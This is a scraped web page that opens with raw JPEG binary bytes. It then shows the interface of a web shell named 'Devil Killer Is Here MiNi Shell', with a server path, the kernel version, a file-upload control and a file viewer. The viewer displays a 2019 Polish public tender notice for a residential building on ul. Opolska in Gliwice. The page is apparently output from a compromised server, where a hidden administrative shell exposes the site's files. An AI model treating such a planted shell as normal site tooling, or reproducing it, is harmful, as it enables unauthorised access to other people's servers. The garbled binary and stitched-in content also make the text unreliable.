JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20190528/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20190528/553468-N-2019.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 553468-N-2019 z dnia 2019-05-28 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Zarząd Budynków Miejskich I Towarzystwo Budownictwa Społecznego Sp. z o.o</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">budowa budynku mieszkalnego przy ul. Opolskiej 12 w Gliwicach</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Roboty budowlane</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Zarząd Budynków Miejskich I Towarzystwo Budownictwa Społecznego Sp. z o.o</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">27656763200000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Dolnych Wałów</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">11</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">44-100</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Gliwice</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">śląskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">323 392 900</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">jurkiewicz@zbmgliwice.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">323 392 962</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.zbmgliwice.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Podmiot prawa publicznego</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">www.zbmgliwice.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.zbmgliwice.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23 listopada 2012 r. - Prawo pocztowe (Dz. U. z 2012 r. poz. 1529 oraz z 2015 r. poz. 1830), osobiście, za pośrednictwem posłańca</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Zarząd Budynków Miejskich I TBS Sp. z o.o. ; Dział Zamówień Publicznych, ul. Dolnych Wałów 11, 44-100 Gliwice</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">budowa budynku mieszkalnego przy ul. Opolskiej 12 w Gliwicach</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">090/PZ/2019/ZBM</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Roboty budowlane</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Zgodnie z numeracją SIWZ: 3.3. Podstawowe danestanowiące opis przedmiotu zamówienia: a: Lokalizacja. Działki nr 213, 212, 211 (obrębCentrum), wraz z przedmiotową nieruchomością, położone są przy ul. Opolskiej 12 (rógOpolskiej i Witkiewicza). Działka ma kształt zbliżony do prostokąta. Od strony północnowschodnieji północno-zachodniej działka graniczy z ulicami, od strony południowozachodniejz terenem Centrum Handlowego ,,Forum" i obiektem handlowo - usługowym, aod południowo-wschodniej - z terenem przychodni lekarskiej. Na działce nr 211zrealizowane zostały dwa budynki mieszkalne na podstawie decyzji o pozwoleniu na budowęnr 1424/2015 z dnia 30.09.2015. Bezpośredni dojazd do nieruchomości odbywa się obecnie zul. Opolskiej i Witkiewicza. Teren inwestycji jest uzbrojony, znajdują się tu: siecielektroenergetyczne i stacja TRAFO, sieci i przyłącza wodociągowe, sieci i przyłączakanalizacji sanitarnej, sieci kanalizacji deszczowej, sieć ciepłownicza. Wszystkie wymienionesieci uzbrojenia podziemnego są to sieci zasilające budynki mieszkaniowe zlokalizowane nadziałce 211. Na terenie inwestycji nie występuje zieleń wysoka, która koliduje z projektowanąinwestycją. b: Planowana inwestycja będzie polegała na wybudowaniu: budynkumieszkalnego czterokondygnacyjnego z podziemnym garażem, układu komunikacjiwewnętrznej, placyków gospodarczych, sieci i przyłączy dla projektowanego obiektu.Zaprojektowano budynek w układzie zamykającym kwartał zabudowy od strony ulic,stanowiący kontynuację zabudowy zrealizowanego etapu inwestycji. Znajduje się onbezpośrednio przy ul. Opolskiej. Na teren inwestycji prowadzą dwa istniejące zjazdy z ul.Opolskiej i Witkiewicza. Obsługują one całą komunikację wewnętrzną zespołu zabudowy.Dodatkowa komunikacja obsługująca projektowany budynek została zaprojektowana wformie ciągów pieszo jezdnych i stanowi kontynuację komunikacji istniejącej, obsługującejwszystkie budynki. Na terenie inwestycji projektuje się 10 miejsc parkingowych. W garażupodziemnym zaprojektowano 26 miejsc postojowych co wraz z rezerwą miejsc istniejącychbilansuje potrzeby mieszkańców (30 mieszkań). Za budynkiem od strony południowozachodniej zaprojektowano kompleks zieleni urządzonej oraz placyk gospodarczy z miejscemskładowania odpadów stałych w formie osobnych boksów. Nie projektuje się placu zabaw,gdyż znajduje się on już w zespole zabudowy. Projekt przewiduje powiązanie komunikacji pieszej i rowerowej z komunikacją wzdłuż ulic Opolskiej i Witkiewicza. c: Posadowienie na działce. Teren objęty inwestycją stanowi trzy działki zlokalizowane przy ul. Opolskiej iWitkiewicza. Budynek zlokalizowano w następujących odległościach od granic terenuinwestycji oraz pozostałych obiektów kubaturowych: 12.50 m od granicy z działką drogową ul. Opolskiej 16.00 m od granicy jezdni ul. Opolskiej 9.70 m od granicy z działką drogową ul.Witkiewicza 3.00 m od granicy z działką 211 17.20 m od budynku mieszkalnego przy ul.Witkiewicza 8 27.40 m od budynku mieszkalnego przy ul. Witkiewicza 8a 8.10 m od placykugospodarczego (odległość okien 10m zgodnie z par.23 Dz.U. z 2002r. nr 75 poz.690) 15.60od placu zabaw (zgodnie z par.40 Dz.U. z 2002r. nr 75 poz.690). d: Przesłanianie inasłonecznienie. Projektowany budynek mieszkalny o wysokości całkowitej 12.65 m zostanie posadowiony w odległości: 17.20 m od budynku mieszkalnego Witkiewicza 8 oraz wodległości 27.40 m od budynku mieszkalnego Witkiewicza 8a. Odległość między budynkami jest zgodna z art.13.1 Rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002 r. wsprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie iumożliwi naturalne oświetlenie projektowanych w budynkach pomieszczeń przeznaczonychna pobyt ludzi. Odległość między planowanymi budynkami jest większa niż projektowana wysokość przesłaniania - równa 12.65 m. Usytuowanie budynków jest także zgodne z par.60Dz.U. z 2002r. nr75 poz.690. co zostało przedstawione na rysunku analizy nasłonecznienia e:Dane podstawowe o obiekcie, zestawienie powierzchni: wymiary projektowanego budynku :48.20m x 22.00m, wysokość 12.65 m łącznie pow. zabudowy budynku mieszkalnego : 930.92m2 łącznie pow. użytkowa budynku mieszkalnego : 2739.62 m2 łącznie pow. użytkowa mieszkań budynku mieszkalnego : 1493.25m2 łącznie kubatura budynku mieszkalnego :8082.0 m3. f: Projektowana ilość mieszkań. Łącznie projektuje się 30 mieszkań w dwóchsegmentach budynku mieszkalnego na trzech kondygnacjach nadziemnych. 3.4. Szczegółowy opis przedmiotu zamówienia określają załączniki, które stanowią integralną część niniejszejSIWZ: a. Dokumentacja techniczna, która stanowi załącznik nr 11 do SIWZ: o Projektbudowlany Tom I i Tom II o Projekt wykonawczy architektura o Projekt wykonawczy konstrukcja o Projekt wykonawczy - instalacje wewnętrzne wod-kan o Projekt wykonawczy -instalacje wewnętrze C.O. o Projekt wykonawczy - instalacje wewnętrzne elektryczne oProjekt wykonawczy - branża drogowa o Projekt wykonawczy - sieci zewnętrzne o Dla wszystkich branż Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych o Dla wszystkich branż przedmiary robót b. Założenia inwestorskie, które stanowią załącznik nr 12do SIWZ c. Pozwolenia na budowę (pierwotne i dwa zmieniające) - decyzja nr 1424/2015 z dnia 30.09.2015r., decyzja nr 66/2016 z dnia 21.01.2016r., decyzja nr 242/2019 z dnia22.02.2019r.; które stanowią załącznik nr 13 do SIWZ. 3.5. Po zakończeniu inwestycji wykonawca przekaże zamawiającemu dokumentację powykonawczą wraz ze świadectwemcharakterystyki energetycznej budynków. Wypełnienie obowiązku będzie stanowiło składową ostatecznego rozliczenia inwestycji. 3.4. Za skuteczne powiadomienie mieszkańców,zakładów usługowych i gestorów sieci o prowadzonych robotach i utrudnieniach z tymzwiązanych odpowiada Wykonawca. Sposób powiadomienia zgodnie z decyzją Wykonawcy iobowiązującym prawem. 3.5. Wykonawca zobowiązany jest do uczestnictwa w przeglądachgwarancyjnych i przeglądzie pogwarancyjnym. Koszty tych przeglądów ponosi Wykonawca.Prosimy o uwzględnienie faktu w wycenie przedmiotu zamówienia. 3.6. Zamawiający dopuszcza prowadzenie przez Wykonawcę robót w systemie dwuzmianowym. 3.7.Dokonanie wizji w terenie. Pomimo szczegółowego opisu przedmiotu zamówienia,Zamawiający informuje o możliwości dokonania przed złożeniem oferty wizji lokalnej terenubudowy, układu komunikacyjnego oraz otoczenia budowy w celu oszacowania przez Wykonawcę na jego własną odpowiedzialność, kosztów i ryzyk oraz wszelkich danych, jakie mogą okazać się niezbędne do prawidłowego przygotowania oferty na wykonanie robótbędących przedmiotem zamówienia. Dokonanie wizji lokalnej nie jest warunkiemkoniecznym do złożenia oferty w niniejszym postępowaniu. Przeprowadzenie ewentualnejwizji lokalnej terenu budowy odbywa się na koszt własny Wykonawcy. 3.8. Rozwiązaniarównoważne. Wszędzie tam, gdzie przedmiot zamówienia został opisany poprzez wskazanieznaków towarowych, patentów lub pochodzenia lub norm, aprobat, specyfikacji technicznychi systemów odniesienia, o których mowa w art.30 ust.1-3 ustawy PZP, Zamawiający dopuszcza oferowanie przez Wykonawcę materiałów lub rozwiązań równoważnych wstosunku do opisanych w dokumentacji projektowej, pod warunkiem, że nie obniżą określonych w dokumentacji projektowej standardów, będą posiadały wymagane odpowiedne atesty, certyfikaty lub dopuszczenia oraz zapewnią wykonanie zamówienia zgodnie z oczekiwaniami i wymaganiami Zamawiającego określonymi w SIWZ. Ponadto Zamawiający w odniesieniu do wszystkich norm, europejskich ocen technicznych aprobat, specyfikacji technicznych i systemów referencji technicznych, wskazanych w opisie przedmiotuzamówienia dopisuje wyrazy ,,lub równoważny" w przypadku braku przedmiotowegookreślenia. Wskazanie w opisie przedmiotu zamówienia przykładowych znaków towarowychpatentów lub pochodzenia ma na celu doprecyzowanie oczekiwań Zamawiającego w stosunkudo przedmiotu zamówienia i stanowi wyłącznie wzorzec jakościowy przedmiotu zamówienia.W takiej sytuacji Zamawiający wymaga od Wykonawcy stosownie do treści art.30 ust.5Ustawy złożenia stosownych dokumentów uwiarygadniających zastosowanie rozwiązańrównoważnych. W przypadku, gdy Wykonawca nie złoży w ofercie dokumentów ozastosowaniu innych równoważnych materiałów lub urządzeń lub rozwiązań, to rozumie sięprzez to, że do kalkulacji ceny oferty ujęto materiały i urządzenia zaproponowane wszczegółowym opisie przedmiotu zamówienia; w związku z tym Wykonawca jestzobowiązany zastosować do wykonania zamówienia materiały lub urządzenia lub rozwiązaniazaproponowane w opisie przedmiotu zamówienia. 3.9. W przypadku, gdy Wykonawca zaproponuje rozwiązania równoważne, w tym materiały, urządzenia i inne elementy,zobowiązany jest wykonać i załączyć do oferty zestawienie wszystkich zaproponowanychrozwiązań równoważnych (np. materiałów, urządzeń oraz innych elementów równoważnych)i wykazać ich równoważność w stosunku do rozwiązań (np. materiału, urządzenia i innegoelementu) zawartych w opisie przedmiotu zamówienia, ze wskazaniem nazwy, strony ipozycji w opisie przedmiotu zamówienia, których dotyczy. 3.10. Opis zaproponowanychrozwiązań równoważnych powinien być dołączony do oferty i musi być na tyle szczegółowy,żeby Zamawiający przy ocenie ofert mógł ocenić spełnienie wymagań dotyczących ichwłaściwości funkcjonalnych, jakościowych i parametrów oraz rozstrzygnąć, czy zaproponowane rozwiązania są równoważne. Oznacza to, że na Wykonawcy spoczywa obowiązek wykazania, że oferowane przez niego rozwiązania (np. materiały, urządzenia iinne elementy) są równoważne w stosunku do opisanych przez Zamawiającego. 3.11.Rozwiązania wynikające z zastosowania przez Wykonawcę materiałów, urządzeń i innychelementów równoważnych nie mogą wywołać żadnych zmian układu funkcjonalnego iparametrów techniczno-użytkowych. 3.12. Zamawiający będzie ponosił koszty serwisowania i konserwacji urządzeń zainstalowanych w ramach zawartej umowy (zgodnie z wymogami producenta). 3.13. Najpóźniej w dniu podpisania umowy (sposób przedstawienia kosztorysówzostał opisany w dalszej części niniejszej SIWZ) wybrany Wykonawca winien przedstawićkosztorys ofertowy (podstawa przedłożonej oferty). Należy podać składowe cenotwórcze (wartość r-g, koszty pośrednie od R i S, zysk od R, S, Kp) dla celów oszacowaniaewentualnych robót zamiennych i niewykonanych. 3.14. Załączone przedmiary stanowią jedynie materiał pomocniczy; ewentualne rozbieżności pomiędzy przedmiarem oraz projektem budowlanym i wykonawczym nie będą podstawą do ewentualnych poszerzeń. 3.15.Zamawiający przewiduje fakturowanie w siedmiu etapach, zgodnie z harmonogramemrzeczowo-finansowym stanowiącym integralną część formularza oferty; rozliczenieryczałtowe. Ewentualne korekty (przy zachowaniu narzuconych terminów wykonania robót)będą ustalone na pierwszym spotkaniu roboczym lub w trakcie realizacji umowy. 3.16. W uzasadnionych przypadkach Zamawiający zastrzega sobie prawo rezygnacji z części robót.Roboty niewykonane, nie podlegają fakturowaniu w ramach niniejszego kontraktu. 3.17.Wykonawca we własnym zakresie dostarcza niezbędny sprzęt, narzędzia oraz materiały dowykonania zamówienia. 3.18. Wykonawca odpowiada za spowodowanie zagrożeń iutrudnień, narażając użytkowników budynku i ich posesji na szkody. 3.19. Wykonawca zobowiązany jest do przestrzegania przepisów BHP i P.POŻ i odpowiada za nieprzestrzeganietych przepisów. 3.20. Zatrudnione osoby winne posiadać aktualne, wymagane prawempolskim zaświadczenia o zdolności do wykonywania prac objętych niniejszym zamówieniem.3.21. Zamawiający nie wyraża zgodny na instalowanie w obrębie realizacji inwestycji (cały teren działki, której dotyczy inwestycja) reklam bez jego zgody. Warunki uzyskania zgody j.w. mogą być przedmiotem oddzielnych negocjacji. Zamawiający zastrzega 